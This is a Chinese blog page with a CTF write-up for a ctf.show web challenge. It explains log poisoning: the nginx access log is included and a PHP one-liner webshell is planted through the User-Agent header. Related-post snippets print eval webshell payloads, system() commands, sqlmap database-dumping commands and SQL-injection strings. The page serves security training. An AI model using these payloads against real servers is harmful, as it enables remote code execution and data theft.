[ctf.show]签到_观己

最新推荐文章于 2024-12-18 23:58:58 发布
原创 最新推荐文章于 2024-12-18 23:58:58 发布 · 962 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文揭示了一种通过在User-Agent字段注入恶意代码到服务器日志,进而控制服务器的方法。详细介绍了如何绕过安全检查,利用data://伪协议失败后的nginx服务器日志文件进行攻击,最终成功植入并激活了一句话木马。

进入题目,显示了源码,其中对于file参数中检测是否包含php字符串,大小写不敏感。

所以伪协议 php://input 等无法使用

 

测试了一下data://伪协议,结果显示目标服务器配置中关闭了这个伪协议

从服务器返回的响应头中可以知道服务器是nginx服务器

nginx服务器的访问日志文件路径是 /var/log/nginx/access.log

尝试包含了一下日志文件,成功

访问日志文件记录了服务器收到的每一次请求的 IP、访问时间、URL、User-Agent,这4项中的前两项的值都是我们无法控制的,我们只能在自己可以控制的字段上做手脚,其中URL字段由于URL编码的存在,空格等一些符号无法包含其中,而User-Agent则不会被进行任何二次处理,我们发什么内容,服务器就将其原封不动的写入日志。

我们写入一个一句话木马。

最低0.47元/天 解锁文章
ctfshow-内部赛-签到
XYH_233的博客
03-30 2155
ctfshow-内部赛-签到
内部赛 签到-ctf.show
yuqie的博客
06-14 597
这结果可是跑了好几个网站才出来,察一下上面的图案,是十二星座,网上科普一下。的字符编码(xx等于该字符在字符集表里面的编码的16进制数字)。天秤座 ♎ U+264E(9月23日 - 10月23日)金牛座 ♉ U+2649(4月21日 - 5月21日)双子座 ♊ U+264A(5月22日 - 6月21日)巨蟹座 ♋ U+264B(6月22日 - 7月22日)狮子座 ♌ U+264C(7月23日 - 8月22日)处女座 ♍ U+264D(8月23日 - 9月22日)
2023SICTF-web-白猫-[签到]Include
m0_73734159的博客
11-28 808
目名称:[签到]Include#目简介:flag位于flag.php,是一个非常简单的文件包含捏~#目环境:#函数理解:substr() 函数返回字符串的一部分如果 start 参数是负数且 length 小于或等于 start,则 length 为 0。语法参数string,必需,规定要返回其中一部分的字符串参数start,必需,规定在字符串的何处开始正数 - 在字符串的指定位置开始负数 - 在从字符串结尾开始的指定位置开始。
ctfshow-web签到,web2
m0_52011198的博客
02-21 810
ctfshow
ctfshow-WEB AK赛-签到_
博客地址 www.sec0nd.top
02-25 2638
文章目录目分析解过程 目分析 打开网页 正则匹配过滤了php,且大小写不敏感 allow_url_include没有开启没有办法用伪协议,应该是利用日志包含解过程 ?file=/var/log/nginx/access.log 发现可以读取nginx的日志内容,那我们可以试试日志包含写一句话 在UA中添加一句话木马 <?php eval($_POST[1]);?> 在POST中令1=system('ls /');查看根目录中的文件 发现有个flag.txt 这里应该就是fl
CTFshow webAK赛 (签到_己)
半文盲半疯癫重度手机爱好者,世界选社恐大赛第二名。
07-15 705
1.打开环境 Fn+F12(或者F12) 检查元素,打开Hackbar。 Hackbar 安装教程 2.首先访问file=/var/log/nginx/access.log看日志文件是否存在 一句话木马: <?php @eval($_GET['pass']);?> 上述操作结果如下: 3.添加 &pass=phpinfo(); 效果: (emm..有点走远了.....) 4. 改成: &pass=system("ca...
ctf.show与学习笔记
Q221022的博客
01-29 3314
ctf.show 1.密码学签到 看到密文之后不难发现,flag就是倒着写的,直接将密文倒叙输出就是答案 2. 看到目,全是由符号组成的,将目内容全部复制到控制台,回车即可得到答案 3. 第三与第二看起来是一样的,所以先将其复制到控制台,发现报错了,有中文的引号,将所有的引号全部换成英文之后还是没有得到flag,········(不会了,没有思路了) 4. 直接用工具计算出私钥d即可 5. 根据rsa密码的解密规则解出m 6. 没有判断出...
ctf.show-web赛
一纸荒芜的博客
03-21 3723
主要分享自己做的心得和积累,共勉之。
CTF.SHOW-CRYPTO
weixin_52108340的博客
02-22 1453
CRTPTO板块。
CTF_Show萌新赛
最新发布
Bulestardemon的博客
12-18 474
ctf wp。
CTFshow-web -入门签到
pone2233的博客
12-15 1632
CTFshow Web web签到 F12 web2 先抓包然后按照流程跑 把之前抓取的数据复制到sqlmap根目录下test.txt内 保存完成后开始跑数据库名 python2 sqlmap.py -r test.txt --dbs 跑数据库内数据表 python2 sqlmap.py -r test.txt -D web2 --tables 查看字段 python2 sqlmap.py -r test.txt -D web2 -T flag --columns [ 查询字段内容 p
WEB AK赛 签到_
m0_51959550的博客
07-15 154
WEB AK赛 签到_己 使用HackBar 在User Agent中写入一句话木马 <?php @eval($_GET['pass']);?> [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-WxQLGQkq-1626326434628)(C:\Users\DELL\AppData\Roaming\Typora\typora-user-images\image-20210715130901720.png)] 添加&pass=phpinfo();
ctfshow-CRYPTO-内部赛-签到
HAI_WD的博客
07-04 784
在线转换一下16进制得到3636364336313637374234393546344334463536343535463333333634343744。说实话这道,正常人很少能绕这么多下绕过来,可能到星座那就无了,只能说脑洞大于思路大于技术。按照对应的顺序排一个序,这里看到2648是白羊,也就是第一个,那么做一下简单的转换。首先看到字符串是一个base64,转换一下。通过base家族爆破一下,最终拿到flag。然后判断一下,使用escape进行解码。看一下base92,得到一个字符串。
ctfshow-内部赛-签到_ctfshow内部赛签到,字节跳动+腾讯+华为+小米+阿里面试分享
2401_84164527的博客
04-09 665
我们需要用到两处地方,即两次对数据库操作的地方,一处用于插入payload,在。代码审懂了,但是脚本编写能力确实还欠佳,参考了一下别的师傅的代码,做了一点修改,直接可以跑出答案。构造出来的SQL:在username处找flag,至于爆表爆字段改一改就行了,(img-v33wYdhf-1712651567314)]进行了过滤,只能显示数字,但是没关系,这里通过hex编码绕过,X:vip204888 (备注网络安全获取)**,一处用于执行payload,在。,还需要注意一点,在。
ctfshow-内部赛-签到_ctfshow内部赛签到,2024最新网络安全面试目解答
m0_61331407的博客
04-07 1271
insert into test1 set email = ‘1’, username = hex(hex(substr((select/**/flag/**/from/**/flag)from/**/1/**/for/**/1))),/*, username=‘*/#’, password = ‘1’import requests import reurl1 = “http://7580c911-e3e6-47eb-8ca8-83252f9038aa.challenge.ctf.show/register
ctfshow 内部赛 pwn 签到
SCP000111的博客
11-16 2091
ctfshow 内部赛 pwn 签到 找了在刷的中,不会做这道,找了好久没找到wp,搞了几天,还怀疑目出错了,结果一看有最近13天前做出来的,又认真在搞。最终搞出来了,原来是csu,不想让后来人向我一样没有wp可以看,解出来马上就写了博客hhhh。 先放图片,2021.11.16该代码可行 这个我找了好久。都没找到wp,但是我看到了一个人的博客,无意间发现他的目似乎与这道一样,于是尝试求解,解出,在这里感谢下作者。这里 作者是偏有宸机,他那里有更好的解释。Ret2libc_64[csu及get
ctfshow-WEB-web1签到
热门推荐
wangyuxiang946的博客
08-19 1万+
ctf.show WEB模块的第一关,这一关的flag藏在注释中,由于开发人员的粗心,没有及时删除开发过程中的代码注释,从而留下了敏感信息 页面中只有一句 where is flag?,我们按F12(或者Fn+F12)进入开发者模式,查看页面的源码 Ctrl+c将源码中的注释复制下来,很明显是加密后的内容,需要进行解密,从而获取flag <!-- Y3Rmc2hvd3sxNTA5MDI4My03ZWM3LTQ0ZTQtOWJmNS03YWIwMzllNDU4OTN9...
[网鼎杯2018]Unfinish&&CTFSHOW内部赛签到
Je3Z的博客
07-15 1752
CTFSHOW那个是根据[网鼎杯2018]Unfinish改编的,有个源码泄露友好些吧,然后过滤的东西不一样,然后感觉不错就总结下 然后扫目录的时候有源码泄露www.zip,下载后读下代码 user.php <?php include('db.php'); session_start(); error_reporting(0); if($_SESSION['u']){ $username=$_SESSION['u']; if (is_numeric($username)) { if(strl
CTF 2020 第二届 网鼎杯 第一道 Misc 签到
狸匪的博客
05-10 2470
这是我在超正式的比赛(网鼎杯)中做出的第一道CTF(甭提有多高兴了) 目地址: http://29ec1ba945124a9b827414b38f4e29030d0e0910e64e466c.cloudgame2.ichunqiu.com/ 这道很简单 首先一上来来一个小游戏: 点击GUESS 开始游戏 :选择世界上CTF 战队名称与图片 一共15道 都选择正确的话会提示输入本战队的 TOKEN 输入 然后就跳转到这个页面了 此时我们并没有什么思路,只知道给了我们flag 按下F1
ctf.show_web5
10-22
ctf.show_web5是一个CTF比赛中的WEB模块第5关,需要传递两个参数v1和v2,要求v1必须是纯字母字符串,v2必须是数字或数字字符串,并且两个参数的md5值必须相等。可以利用md5的0e漏洞进行绕过。具体来说,可以构造一个字符串,使得它的md5值以0e开头,然后将这个字符串作为v1和v2的值传递即可。在PHP中,当字符串以0e开头并且后面跟着一串数字时,PHP会将这个字符串解析成科学计数法的形式,因此可以绕过is_numeric()函数的检测。而ctype_alpha()函数只检测字符串中是否仅包含字母,不会对字符串进行其他处理,因此不会受到0e漏洞的影响。
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值